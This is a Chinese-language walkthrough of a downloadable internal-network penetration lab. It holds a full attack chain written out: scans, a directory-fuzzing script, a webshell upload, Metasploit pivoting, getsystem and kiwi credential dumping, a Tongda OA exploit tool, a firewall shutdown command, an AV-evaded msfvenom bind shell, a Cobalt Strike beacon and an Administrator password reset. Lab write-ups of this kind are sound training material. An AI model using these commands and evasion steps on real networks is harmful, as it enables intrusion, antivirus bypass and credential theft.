暗月内网靶场渗透笔记
简介
靶场下载地址:
靶场地址: https://pan.baidu.com/share/init?surl=2pSYxSU-ZmurQ9--GFiaXQ
提取码: 3p47
虚拟机网络设置:
靶场拓扑图:
靶机账号密码:
信息收集
内网扫描
靶机就在本地,直接进行本地内网扫描即可,扫描当前网段:
nmap -sP 192.168.0.0/24
只有这一台机子是IP未知的,其他设备都是自己的,故判断为目标靶机
端口扫描
因暗月靶机上都有360和各种安全软件,所以扫描速率不能太快,先使用masscan扫描到开放的端口,再用nmap获取端口的详细信息
masscan -p 1-65535 192.168.0.114 --rate=100
rate:设置为每秒发100个请求包
一共开放了6个端口,现在使用nmap去获取端口的详细信息
nmap -sV -p 3389,5985,6588,999,21,80 192.168.0.114
sV:扫描端口服务版本
p:扫描指定的端口
现在去web页面上看看有没有突破点,首先本地DNS解析一下域名
echo "192.168.0.114 www.moonlab.com" >> /etc/hosts
然后访问这个域名
什么也没有,只能fuzz目录了
FUZZ
需要注意的是,靶机上开启了防火墙和安全软件,网站上也有waf,无论你访问哪个目录都返回200
如果都返回200,就不能用工具扫了,我们自己写一个简单的python脚本去爆破目录
#encoding:utf-8
from cgitb import reset
import requests
import sys
import time
with open ('dicc.txt','r',encoding='UTF-8') as readfile: #扫描目录所用的字典
for dirs in readfile.readlines(): #一个for循环,将字典参数导入到dirs变量里
url = 'http://www.moonlab.com/'+dirs.strip('\n') #扫描的目录
resp = requests.get(url) #访问url变量里的值,并将得到的结果导入到resp变量里
strlen = len(resp.text) #获取文本大小,并将大小导入到strlen变量里
print(url+' statu: '+str(resp.status_code)+' lens: '+str(strlen)) #输出扫描的结果
time.sleep(2) #sleep两秒
if resp.status_code == 200 or resp.status_code == 403 or resp.status_code == 500 or resp.status_code == 301: #if判断,如果请求等于条件,判断为真,继续执行下面的代码
if str(strlen) != "2939": #如果文本大小不等于2939,就为真,继续执行下面的代码
with open('url.txt','a',encoding='UTF-8') as writefile: #创建一个名为url.txt的文件
writefile.write(url+' statu: '+str(resp.status_code)+' lens: '+str(strlen)+'\n') #写入内容
执行这个脚本去fuzz目录
python3 urlscan.py
其他目录大小都是2939,只有这个目录不一样,我们直接去访问这个目录看看
robots.txt 文件规定了搜索引擎抓取的网站上网址
拿到shell
这里给出了三个目录,第一个是一个登录页面
遇到登录页面的渗透测试思路为
sql注入
暴力破解
csrf
js泄露
逻辑漏洞
这个网站后台存在的漏洞为逻辑漏洞,在登录框下面有一个忘记密码,我们输入admin
随便输入一个答案
回到burp,点击http历史,找到输入答案的包
点击这个包,ctrl+r
我们把answer参数改为空,然后再发送看看会发生什么
直接出现了密码,说明网站的验证逻辑有问题,我们用这个账号密码进入后台
进入后台后,最常见的拿shell方式就是文件上传了,我们需要找到一个能上传文件的页面
在模板管理这可以修改网站文件,我们随便点击一个
将冰蝎自带的aspx一句话木马写进去
然后保存,访问文件
打开冰蝎连接
连接成功
搜集主机信息
获取当前用户全部信息
whoami /all
我们只是一个普通用户,但是有这三个特权
获取全部网络信息
ipconfig /all
这里看到他还有一个内网ip
获取主机详细信息
systeminfo
查看开放端口
netstat -ano
查看开启的服务
net start
不仅有安全狗,自带的防火墙也开启了
查看后台进程
tasklist
反向代理
转移shell
我们先将shell转移到msf里,方便利用
msf进入监听后,回到冰写,进入反弹shell页面,设置ip和端口,ip是kali的ip,端口是msf设置的端口
成功将shell转移到msf里
设置代理
添加网段
查看全局网段
run get_local_subnets
10.10.1.0/24是他们的内网,我们添加这个网段即可
run autoroute -s 10.10.1.0/24
查看添加的网段
run autoroute -p
然后输入bg返回msf,使用auxiliary/server/socks_proxy代理模块
bg
use auxiliary/server/socks_proxy
设置代理的端口,然后运行
set SRVPORT 1234
run
然后新开一个终端,编辑这个文件,拉到最下面,输入msf设置的端口
vim /etc/proxychains4.conf
保存后退出,然后看看配置成功没
proxychains4 curl 10.10.1.130
成功访问
拿下windows server 2016-web
提权
回到msf里,进入会话
sessions -i 1
然后尝试用meterperter的默认提权exp去提权
getsystem
迁移进程
成功提权到最高权限,通过之前nmap扫描的结果,它已经开启了3389端口,我们导出密码即可,但首先需要迁移进程到一个稳定运行的程序里,这样才能正常导出密码
ps #查看后台进程
随便导入到一个稳定的进程里
migrate 3344
查看shell pid号
getpid
成功迁移了
获取密码
msf导入kiwi
load kiwi
提取密码
creds_all
成功获取密码,之后用远程桌面连接即可
内网信息收集
查看路由表
arp -a
我们拿下的这台主机内网ip是10.10.1.131,这个10.10.1.130是未知的,估计是内网的另一台主机
由于内网另一台机子开启了防护软件,无法ping通和扫描,我们直接访问80端口去测试
浏览器设置代理
访问10.10.1.130
拿下Windows server 2012-oa
这是一个通达的后台OA,Google搜索相关的漏洞和poc即可
https://pan.baidu.com/s/14aKGmg_jmyAJHzHjgYJQHQ
提取码:hx1y
进入文件夹后运行这个命令
proxychains4 java -jar 通达OA综合利用工具_圈子社区专版.jar
启动哥斯拉连接这个url
https://github.com/BeichenDream/Godzilla/releases/tag/v4.0.1-godzilla
连接成功
NetSh Advfirewall set allprofiles state off
关闭windows防火墙
拿下最终主机
转移shell
由于目标不出网,我们只能生成一个正向shell木马来将shell转移到msf里
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/shikata_ga_nai -i 20 -f c -o 123.txt
使用这个工具进行一个简单的免杀
https://github.com/1y0n/AV_Evasion_Tool/releases/tag/2.0
打开这个工具,将msfveno生成的123.txt文件里的内容粘贴上去
回到哥斯拉,找一个文件夹上传木马
回到msf,设置监听模块
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.1.130
set lport 4444
options
run
终端执行这个木马
成功连接
迁移进程
首先需要迁移进程到一个稳定运行的程序里,这样才能正常导出密码
ps #查看后台进程
随便导入到一个稳定的进程里
migrate 3756
查看shell pid号
getpid
迁移成功
转移shell到cs
打开cs,没有的话直接私聊我就好了
监听器设置
生成木马
回到msf,上传木马
upload /beacon.exe
进入shell,执行木马
这个会话是第一台机子windows server 2016-web,上传个木马然后执行就能获得会话
回到cs,连接这个木马
connect 10.10.1.130 7777
成功获得会话
右击会话,点击文件浏览
可以看到还有一个域用户
查看当前主机域名
net domain
查看域控登录的主机信息
net computers
10.10.1.130是当前主机,而10.10.10.165是最终flag所在的主机
获取域用户密码
hashdump
logonpasswords
查看密码凭证
爆破这个域用户密码
https://www.somd5.com/
回到msf,进入shell修改密码
net user Administrator Ba1_Ma0123456
开启10.10.1.130主机的3389端口
run post/windows/manage/enable_rdp
用第一台我们拿下的主机去连接
在这个主机上也使用远程桌面连接
输入域名\用户名和爆破出的密码
成功登录
flag
